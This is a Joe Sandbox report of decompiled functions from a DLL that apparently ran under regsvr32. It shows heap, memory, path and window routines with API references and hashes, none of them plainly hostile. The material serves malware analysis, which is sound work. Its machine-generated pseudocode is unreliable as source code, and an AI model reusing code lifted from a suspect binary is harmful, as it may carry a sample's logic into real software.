EnterCriticalSection.KERNEL32(10048600,?,?,?,?,100485E4,10010A9E,00000004,1000EC18,10004E88,1000EC41,1000FF70,00000000,1000FFF6,00000001), ref: 10010772
GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,100485E4,10010A9E,00000004,1000EC18,10004E88,1000EC41,1000FF70,00000000,1000FFF6,00000001), ref: 100107C8
GlobalHandle.KERNEL32(006856A0), ref: 100107D1
GlobalUnlock.KERNEL32(00000000,?,?,?,?,100485E4,10010A9E,00000004,1000EC18,10004E88,1000EC41,1000FF70,00000000,1000FFF6,00000001), ref: 100107DA
GlobalReAlloc.KERNEL32 ref: 100107F1
GlobalHandle.KERNEL32(006856A0), ref: 10010803
GlobalLock.KERNEL32 ref: 1001080A
LeaveCriticalSection.KERNEL32(?,?,?,?,?,100485E4,10010A9E,00000004,1000EC18,10004E88,1000EC41,1000FF70,00000000,1000FFF6,00000001), ref: 10010814
GlobalLock.KERNEL32 ref: 10010820
_memset.LIBCMT ref: 10010839
LeaveCriticalSection.KERNEL32(?,00000058,10003840), ref: 10010865

Memory Dump Source

Source File: 00000002.00000002.259635846.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.259568974.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259703759.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259750364.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259817552.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259866776.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259911607.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259942125.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259964401.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.260018017.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: Global$CriticalSection$AllocHandleLeaveLock$EnterUnlock_memset
String ID:
API String ID: 496899490-0
Opcode ID: 996242b7fcfa61bad23c73a9a116ea6815c52f49dbe0cd54541e6c2615ba2795
Instruction ID: cc07cb1ae1718158ec5411955b1f766252c932f609a865be9411df0e50f52d34
Opcode Fuzzy Hash: 996242b7fcfa61bad23c73a9a116ea6815c52f49dbe0cd54541e6c2615ba2795
Instruction Fuzzy Hash: 013180757047159FE325DF24CC88A2A77E9FF44241B01892DF9D6CB652DBB1F8848B60

Uniqueness

Uniqueness Score: -1.00%

Function 1001F6F4 Relevance: 7.5, APIs: 5, Instructions: 44
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 27%

			E1001F6F4(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t10;
				intOrPtr _t13;
				intOrPtr _t23;
				void* _t25;

				_push(0xc);
				_push(0x10041288);
				_t8 = E10022714(__ebx, __edi, __esi);
				_t23 =  *((intOrPtr*)(_t25 + 8));
				if(_t23 == 0) {
					L9:
					return E10022759(_t8);
				}
				if( *0x1004a564 != 3) {
					_push(_t23);
					L7:
					_push(0);
					_t8 = RtlFreeHeap( *0x10048aa4); // executed
					_t31 = _t8;
					if(_t8 == 0) {
						_t10 = E10020B71(_t31);
						 *_t10 = E10020B36(GetLastError());
					}
					goto L9;
				}
				E10023FE8(4);
				 *(_t25 - 4) =  *(_t25 - 4) & 0x00000000;
				_t13 = E10024061(_t23);
				 *((intOrPtr*)(_t25 - 0x1c)) = _t13;
				if(_t13 != 0) {
					_push(_t23);
					_push(_t13);
					E1002408C();
				}
				 *(_t25 - 4) = 0xfffffffe;
				_t8 = E1001F74A();
				if( *((intOrPtr*)(_t25 - 0x1c)) != 0) {
					goto L9;
				} else {
					_push( *((intOrPtr*)(_t25 + 8)));
					goto L7;
				}
			}

APIs

__lock.LIBCMT ref: 1001F712

Part of subcall function 10023FE8: __mtinitlocknum.LIBCMT ref: 10023FFC
Part of subcall function 10023FE8: __amsg_exit.LIBCMT ref: 10024008
Part of subcall function 10023FE8: EnterCriticalSection.KERNEL32(00000001,00000001,?,10025F0B,0000000D,10041560,00000008,10025FFD,00000001,?,?,00000001,?,?,1002092A,00000001), ref: 10024010

___sbh_find_block.LIBCMT ref: 1001F71D
___sbh_free_block.LIBCMT ref: 1001F72C
RtlFreeHeap.NTDLL(00000000,?,10041288,0000000C,10025E61,00000000,?,1002692B,?,00000001,00000001,10023F72,00000018,100413C8,0000000C,10024001), ref: 1001F75C
GetLastError.KERNEL32(?,1002692B,?,00000001,00000001,10023F72,00000018,100413C8,0000000C,10024001,00000001,00000001,?,10025F0B,0000000D,10041560), ref: 1001F76D

Memory Dump Source

Source File: 00000002.00000002.259635846.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.259568974.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259703759.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259750364.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259817552.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259866776.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259911607.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259942125.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259964401.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.260018017.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
String ID:
API String ID: 2714421763-0
Opcode ID: 76888bbc55651325260b5972d5f97c4dddcca1bfca01a2c3470237c6f9f3f0fd
Instruction ID: dcea96c0beb71c26c32ed6edefd011e4960108453953efdd22255c92b90fc265
Opcode Fuzzy Hash: 76888bbc55651325260b5972d5f97c4dddcca1bfca01a2c3470237c6f9f3f0fd
Instruction Fuzzy Hash: 3E01A235809311EAEB21EBB0AD4A75E3BA4DF05364F51421CF500EE0E1CB34D9C0CA55

Uniqueness

Uniqueness Score: -1.00%

Function 1000373C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 13
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E1000373C() {
				int _t1;

				_t1 =  *0x10046a8c; // 0x64ec08
				if(_t1 == 0) {
					ExitProcess(_t1);
				}
				 *((intOrPtr*)(E10003122(_t1, "DllRegisterServer")))(); // executed
				return 0;
			}

0x1000373c
0x10003743
0x10003746
0x10003746
0x10003759
0x1000375d

APIs

ExitProcess.KERNEL32 ref: 10003746

Strings

DllRegisterServer, xrefs: 1000374C

Memory Dump Source

Source File: 00000002.00000002.259635846.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.259568974.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259703759.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259750364.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259817552.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259866776.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259911607.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259942125.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259964401.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.260018017.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: ExitProcess
String ID: DllRegisterServer
API String ID: 621844428-1663957109
Opcode ID: 291628bf29a1733aeefe0036b6084d4be0373c307bf806f308028e93738353d8
Instruction ID: 5b79a9f3272a285f0bc727d2d6f4db5e8a7be798465fbb40fb281ab7da0c5106
Opcode Fuzzy Hash: 291628bf29a1733aeefe0036b6084d4be0373c307bf806f308028e93738353d8
Instruction Fuzzy Hash: A4C08CF22082016BF602EBB08C8880B238CEB08292311C808F000D7005EF39E4000A00

Uniqueness

Uniqueness Score: -1.00%

Function 10024B73 Relevance: 3.0, APIs: 2, Instructions: 28
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E10024B73(intOrPtr _a4) {
				void* _t6;
				intOrPtr _t7;
				void* _t10;

				_t6 = HeapCreate(0 | _a4 == 0x00000000, 0x1000, 0); // executed
				 *0x10048aa4 = _t6;
				if(_t6 != 0) {
					_t7 = E10024B18(__eflags);
					__eflags = _t7 - 3;
					 *0x1004a564 = _t7;
					if(_t7 != 3) {
						L5:
						__eflags = 1;
						return 1;
					} else {
						_t10 = E10024019(0x3f8);
						__eflags = _t10;
						if(_t10 != 0) {
							goto L5;
						} else {
							HeapDestroy( *0x10048aa4);
							 *0x10048aa4 =  *0x10048aa4 & 0x00000000;
							goto L1;
						}
					}
				} else {
					L1:
					return 0;
				}
			}

APIs

HeapCreate.KERNEL32(00000000,00001000,00000000,100207AC,00000001,?,?,00000001,?,?,1002092A,00000001,?,?,10041328,0000000C), ref: 10024B84
HeapDestroy.KERNEL32(?,?,00000001,?,?,1002092A,00000001,?,?,10041328,0000000C,100209E4,?), ref: 10024BBA

Memory Dump Source

Source File: 00000002.00000002.259635846.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.259568974.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259703759.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259750364.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259817552.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259866776.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259911607.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259942125.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259964401.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.260018017.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: Heap$CreateDestroy
String ID:
API String ID: 3296620671-0
Opcode ID: a1744ea04a4e4aac06c1af9c57638635ef45047b2ea6b21dfa4896526f954c19
Instruction ID: 7ecfd6e5781d3b6a0fc92bf663133c7527b62661b4374eaf376562758425141b
Opcode Fuzzy Hash: a1744ea04a4e4aac06c1af9c57638635ef45047b2ea6b21dfa4896526f954c19
Instruction Fuzzy Hash: 26E02230A123129EF786CB30AF8671A33F4EB06382F424836F004C98A0FFB0C140DA05

Uniqueness

Uniqueness Score: -1.00%

Function 100036FA Relevance: 1.5, APIs: 1, Instructions: 28
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 75%

			E100036FA(void* __ebx, void* __esi, void* __eflags) {
				void* _t2;
				signed int _t7;
				char _t9;
				signed int _t12;
				void* _t14;
				void* _t15;
				signed int _t17;

				_t2 = E1001F631(__ebx, _t14, _t15, __esi,  *0x100440e4);
				if(_t2 != 0) {
					_t12 =  *0x100440e4; // 0x0
					_push(__ebx);
					_t9 = 0;
					__eflags = _t12;
					_push(__esi);
					_t17 = _t12;
					if(__eflags > 0) {
						do {
							 *((char*)(_t9 + _t2)) = _t9;
							_t9 = _t9 + 1;
							__eflags = _t9 -  *0x100440e4; // 0x0
						} while (__eflags < 0);
					}
					_push(_t2); // executed
					E1001F6F4(_t9, _t15, _t17, __eflags); // executed
					asm("sbb eax, eax");
					_t7 =  ~(_t9 - _t17) & 0x00000003;
					__eflags = _t7;
					return _t7;
				} else {
					return _t2;
				}
			}

APIs

_malloc.LIBCMT ref: 10003700

Part of subcall function 1001F631: __FF_MSGBANNER.LIBCMT ref: 1001F654
Part of subcall function 1001F631: __NMSG_WRITE.LIBCMT ref: 1001F65B
Part of subcall function 1001F631: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,1002692B,?,00000001,00000001,10023F72,00000018,100413C8,0000000C,10024001,00000001), ref: 1001F6A9

Memory Dump Source

Source File: 00000002.00000002.259635846.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.259568974.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259703759.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259750364.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259817552.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259866776.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259911607.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259942125.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259964401.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.260018017.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: AllocateHeap_malloc
String ID:
API String ID: 501242067-0
Opcode ID: 2f76cf260a46a9d53b32d34cea165e875efa5fab80f71dccc9ba808c39acbc3c
Instruction ID: adc5ccbd96ec724cefc73a2f5283e4f6b1af06d455631b59cbb6fed6ff4e13e7
Opcode Fuzzy Hash: 2f76cf260a46a9d53b32d34cea165e875efa5fab80f71dccc9ba808c39acbc3c
Instruction Fuzzy Hash: 53E086BA2141A24AFF19DAF89EE68562748D7110913228A7EE646C6556DA20E8208250

Uniqueness

Uniqueness Score: -1.00%

Function 10020E42 Relevance: 1.5, APIs: 1, Instructions: 6
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 25%

			E10020E42() {
				void* _t1;
				void* _t2;
				void* _t3;
				void* _t4;
				void* _t7;

				_push(1);
				_push(0);
				_push(0); // executed
				_t1 = E10020D63(_t2, _t3, _t4, _t7); // executed
				return _t1;
			}

0x10020e42
0x10020e44
0x10020e46
0x10020e48
0x10020e50

APIs

_doexit.LIBCMT ref: 10020E48

Part of subcall function 10020D63: __lock.LIBCMT ref: 10020D71
Part of subcall function 10020D63: __decode_pointer.LIBCMT ref: 10020DA0
Part of subcall function 10020D63: __decode_pointer.LIBCMT ref: 10020DAD

Memory Dump Source

Source File: 00000002.00000002.259635846.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.259568974.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259703759.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259750364.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259817552.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259866776.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259911607.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259942125.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259964401.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.260018017.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: __decode_pointer$__lock_doexit
String ID:
API String ID: 3276244213-0
Opcode ID: 97d4102892187832ff4b1b75b5546cda8401932d03e1046da499ccbf3089c980
Instruction ID: ebb22d002e4bc0be4ce9b3835a93604f57b833b8c7c0406f906832a81f765660
Opcode Fuzzy Hash: 97d4102892187832ff4b1b75b5546cda8401932d03e1046da499ccbf3089c980
Instruction Fuzzy Hash: 0CA00279BD530062F871D1903CD3F5421065750F01FD40051BB182C1C2A5C732584057

Uniqueness

Uniqueness Score: -1.00%

Function 1000302D Relevance: 1.3, APIs: 1, Instructions: 6
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E1000302D(void* _a4, long _a8, long _a12, long _a16) {
				void* _t5;

				_t5 = VirtualAlloc(_a4, _a8, _a12, _a16); // executed
				return _t5;
			}

0x1000303d
0x10003043

APIs

VirtualAlloc.KERNEL32(?,?,?,?), ref: 1000303D

Memory Dump Source

Source File: 00000002.00000002.259635846.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.259568974.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259703759.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259750364.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259817552.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259866776.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259911607.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259942125.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259964401.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.260018017.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 1fbba5c948703a5d5ab931949a929f4f09bd1ed6a173005a8193a93e686e7ec2
Instruction ID: 5d0982da9e6573c30bbcbca7a50cfe3a5b7972743b959b5c0e66da410622836f
Opcode Fuzzy Hash: 1fbba5c948703a5d5ab931949a929f4f09bd1ed6a173005a8193a93e686e7ec2
Instruction Fuzzy Hash: 1CB00832418792EBDF02DF90CD4482ABAA2BB89301F184C5CF6A151570D7228468EF07

Uniqueness

Uniqueness Score: -1.00%

Function 10003044 Relevance: 1.3, APIs: 1, Instructions: 5
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E10003044(void* _a4, long _a8, long _a12) {
				int _t4;

				_t4 = VirtualFree(_a4, _a8, _a12); // executed
				return _t4;
			}

0x10003050
0x10003056

APIs

VirtualFree.KERNELBASE(?,?,?), ref: 10003050

Memory Dump Source

Source File: 00000002.00000002.259635846.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.259568974.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259703759.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259750364.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259817552.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259866776.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259911607.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259942125.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259964401.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.260018017.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: df584dda371157191712c15505aae26ff14b4c57a0491ab4d9c6d3331c076541
Instruction ID: 115bf12ed0fa7589b407f79f41f639b3f7b4823b02c2866c4b7f4f1f1b5172d7
Opcode Fuzzy Hash: df584dda371157191712c15505aae26ff14b4c57a0491ab4d9c6d3331c076541
Instruction Fuzzy Hash: 43B00235408610FFDF025F50DD4480ABBA2BB89321F10D958F1AA51430D7329420EF07

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 10011C86 Relevance: 12.1, APIs: 8, Instructions: 129
filestringCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E10011C86(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* __ebp;
				signed int _t38;
				long _t49;
				CHAR* _t50;
				CHAR* _t56;
				CHAR* _t59;
				void* _t61;
				int _t65;
				CHAR* _t74;
				void* _t75;
				void* _t76;
				void* _t89;
				void* _t90;
				CHAR* _t92;
				void* _t93;
				void* _t96;
				struct _WIN32_FIND_DATAA* _t98;
				void* _t100;
				CHAR* _t106;

				_t94 = __esi;
				_t90 = __edx;
				_t76 = __ecx;
				_t98 = _t100 - 0x13c;
				_t38 =  *0x10045580; // 0x771f5646
				 *(_t98 + 0x140) = _t38 ^ _t98;
				_push(0x14);
				E1001FBC4(E10033C93, __ebx, __edi, __esi);
				_t92 =  *(_t98 + 0x14c);
				_t74 =  *(_t98 + 0x150);
				 *((intOrPtr*)(_t98 - 0x18)) =  *((intOrPtr*)(_t98 + 0x154));
				_t106 = _t92;
				_t107 = _t106 == 0;
				if(_t106 == 0) {
					L1:
					E10004E6E(_t74, _t76, _t92, _t94, _t107);
				}
				if((0 | _t74 != 0x00000000) == 0) {
					goto L1;
				}
				_t49 = GetFullPathNameA(_t74, 0x104, _t92, _t98 - 0x14);
				if(_t49 != 0) {
					__eflags = _t49 - 0x104;
					if(_t49 >= 0x104) {
						goto L5;
					} else {
						E1000424F(_t98 - 0x10, E1001044F());
						 *(_t98 - 4) =  *(_t98 - 4) & 0x00000000;
						E10011ABC(_t74, _t98, __eflags, _t92, _t98 - 0x10);
						_t56 = PathIsUNCA( *(_t98 - 0x10));
						__eflags = _t56;
						if(_t56 != 0) {
							L19:
							E10001260( &(( *(_t98 - 0x10))[0xfffffffffffffff0]), _t90);
							_t50 = 1;
							__eflags = 1;
						} else {
							_t59 = GetVolumeInformationA( *(_t98 - 0x10), _t56, _t56, _t56, _t98 - 0x20, _t98 - 0x1c, _t56, _t56);
							__eflags = _t59;
							if(_t59 != 0) {
								__eflags =  *(_t98 - 0x1c) & 0x00000002;
								if(( *(_t98 - 0x1c) & 0x00000002) == 0) {
									CharUpperA(_t92);
								}
								__eflags =  *(_t98 - 0x1c) & 0x00000004;
								if(( *(_t98 - 0x1c) & 0x00000004) != 0) {
									goto L19;
								} else {
									_t61 = FindFirstFileA(_t74, _t98);
									__eflags = _t61 - 0xffffffff;
									if(_t61 == 0xffffffff) {
										goto L19;
									} else {
										FindClose(_t61);
										__eflags =  *(_t98 - 0x14);
										if( *(_t98 - 0x14) == 0) {
											goto L10;
										} else {
											__eflags =  *(_t98 - 0x14) - _t92;
											if( *(_t98 - 0x14) <= _t92) {
												goto L10;
											} else {
												_t65 = lstrlenA( &(_t98->cFileName));
												_t89 =  *(_t98 - 0x14) - _t92;
												__eflags = _t65 + _t89 - 0x104;
												if(_t65 + _t89 >= 0x104) {
													goto L10;
												} else {
													_t97 = 0x104 - _t89;
													__eflags = 0x104 - _t89;
													E10005C93(_t74, _t90, _t92, 0x104 - _t89, _t98,  *(_t98 - 0x14), _t97,  &(_t98->cFileName));
													goto L19;
												}
											}
										}
									}
								}
							} else {
								_push(_t74);
								E10011C5B( *((intOrPtr*)(_t98 - 0x18)));
								L10:
								E10001260( &(( *(_t98 - 0x10))[0xfffffffffffffff0]), _t90);
								goto L5;
							}
						}
					}
				} else {
					E10004EB7(_t74, _t76, _t92, 0x104, _t98, _t92, 0x104, _t74, 0xffffffff);
					_push(_t74);
					E10011C5B( *((intOrPtr*)(_t98 - 0x18)));
					L5:
					_t50 = 0;
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t98 - 0xc));
				_pop(_t93);
				_pop(_t96);
				_pop(_t75);
				return E1001FBB5(_t50, _t75,  *(_t98 + 0x140) ^ _t98, _t90, _t93, _t96);
			}

APIs

__EH_prolog3.LIBCMT ref: 10011CA5
GetFullPathNameA.KERNEL32(?,00000104,?,?,00000014), ref: 10011CE6

Part of subcall function 10004E6E: __CxxThrowException@8.LIBCMT ref: 10004E82
Part of subcall function 10004E6E: __EH_prolog3.LIBCMT ref: 10004E8F

PathIsUNCA.SHLWAPI(?,00000000), ref: 10011D30
GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,?,?,00000000,00000000), ref: 10011D4E
CharUpperA.USER32(?), ref: 10011D75
FindFirstFileA.KERNEL32(?,00000000), ref: 10011D86
FindClose.KERNEL32(00000000), ref: 10011D92
lstrlenA.KERNEL32(?), ref: 10011DA7

Memory Dump Source

Source File: 00000002.00000002.259635846.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.259568974.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259703759.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259750364.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259817552.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259866776.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259911607.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259942125.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259964401.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.260018017.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: FindH_prolog3Path$CharCloseException@8FileFirstFullInformationNameThrowUpperVolumelstrlen
String ID:
API String ID: 4099955704-0
Opcode ID: 34f6f2e06f6c52f7f72971c1c83acd915632a22f9182f0fa51328fb5f4cbc38c
Instruction ID: 71c2b450ac2c88f27229685b2eaf748cff0cdd07423a00f921b144b935e16ce8
Opcode Fuzzy Hash: 34f6f2e06f6c52f7f72971c1c83acd915632a22f9182f0fa51328fb5f4cbc38c
Instruction Fuzzy Hash: E841CD71A0014AAFEB15DBB4CC89AFF77BCEF44355F010529F915EA192EB30E984CA60

Uniqueness

Uniqueness Score: -1.00%

Function 100037A6 Relevance: 9.1, APIs: 6, Instructions: 65
windowCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E100037A6(void* __ecx, void* __edx) {
				signed int _v8;
				int _v88;
				char _v92;
				struct tagRECT _v108;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t16;
				int _t18;
				void* _t19;
				int _t23;
				int _t24;
				void* _t40;
				void* _t48;
				void* _t49;
				void* _t52;
				signed int _t53;

				_t48 = __edx;
				_t16 =  *0x10045580; // 0x771f5646
				_v8 = _t16 ^ _t53;
				_t52 = __ecx;
				_t18 = IsIconic( *(__ecx + 0x20));
				_t54 = _t18;
				if(_t18 == 0) {
					_t19 = E10007997(_t40, _t52, _t49, _t52, __eflags);
				} else {
					_push(_t40);
					E1001017C(_t40,  &_v92, _t49, _t52, _t54);
					SendMessageA( *(_t52 + 0x20), 0x27, _v88, 0);
					_t23 = GetSystemMetrics(0xb);
					_t24 = GetSystemMetrics(0xc);
					GetClientRect( *(_t52 + 0x20),  &_v108);
					asm("cdq");
					asm("cdq");
					DrawIcon(_v88, _v108.right - _v108.left - _t23 + 1 - _t48 >> 1, _v108.bottom - _v108.top - _t24 + 1 - _t48 >> 1,  *(_t52 + 0x11c));
					_t19 = E100101D0(_t23,  &_v92, _t24, _t52, _t54);
					_t49 = _t52;
					_t40 = _t49;
				}
				return E1001FBB5(_t19, _t40, _v8 ^ _t53, _t48, _t49, _t52);
			}

APIs

IsIconic.USER32 ref: 100037BC

Part of subcall function 1001017C: __EH_prolog3.LIBCMT ref: 10010183
Part of subcall function 1001017C: BeginPaint.USER32(?,?,00000004,100079AE,?,00000058,10003840), ref: 100101AF

SendMessageA.USER32 ref: 100037DB
GetSystemMetrics.USER32 ref: 100037E9
GetSystemMetrics.USER32 ref: 100037EF
GetClientRect.USER32 ref: 100037FA
DrawIcon.USER32 ref: 10003827

Part of subcall function 100101D0: __EH_prolog3.LIBCMT ref: 100101D7
